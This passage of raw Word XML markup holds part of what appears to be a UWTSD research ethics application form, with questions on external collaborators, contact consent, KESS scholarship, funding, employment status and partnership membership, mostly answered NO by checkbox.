              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7CBDABA3"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796" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="136E8FB8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1016347612"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="138C30EE"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1DC0DF51" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549EC480" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9918" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
          </w:tcPr>
          <w:p w14:paraId="69E5537D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If Yes, please provide the name of the external organisation and name and contact details for the main contact person and confirmation this person has consented to their personal data being shared.as part of this collaboration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="3C7577A3" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B43F867" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="499D2FF4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Institution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6095" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
          </w:tcPr>
          <w:p w14:paraId="2E4587BF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="7F2B4D98" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="017B8C79" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7BC8B2C7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Contact person name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6095" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
          </w:tcPr>
          <w:p w14:paraId="5D7F7EAB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="19789DB2" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B4CBA81" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="099BAB20" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Contact person e-mail address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6095" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
          </w:tcPr>
          <w:p w14:paraId="3400B04F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="6BA4E420" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="434664B8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6232" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E92C360" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Has this individual consented to sharing their details on this form?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F5E4697" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EC6ED7E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-287595643"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7091BE0E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1755960482"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="223523A3"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5F8EA975" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2FD09D81" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6232" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="71373DB2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Are you in receipt of a KESS scholarship?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F46BBB7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="079C449C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1563443322"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1100C228" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-748419000"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="652535D2"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70699090" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F07C41E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6232" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="67FBB233" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Is your research externally funded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DF03FBF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44CA4778" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1911424659"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F24B291" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1876681663"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="5DE334B3"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068E192A" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="386"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1CDBE6D7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B3389C4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Are you specifically employed to undertake this research in either a paid or voluntary capacity?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4338FEDE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Voluntary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C965C3E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1452555905"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2F5DAF4F"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982" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="381B3C0C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1824587797"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="07DB63BE"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4162F682" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="386"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="14680906" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="762ED776" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0CB11D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Employed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47F3B16D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-361060577"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6AEA813B"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982" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="416C9E15" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1007364088"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7EF969F6"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5C38B066" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0C97A1B0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="302282DA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Is the research being undertaken within an existing UWTSD Athrofa Professional Learning Partnership (APLP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3702BB97" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If YES then the permission question below does not need to be answered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EE353E3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
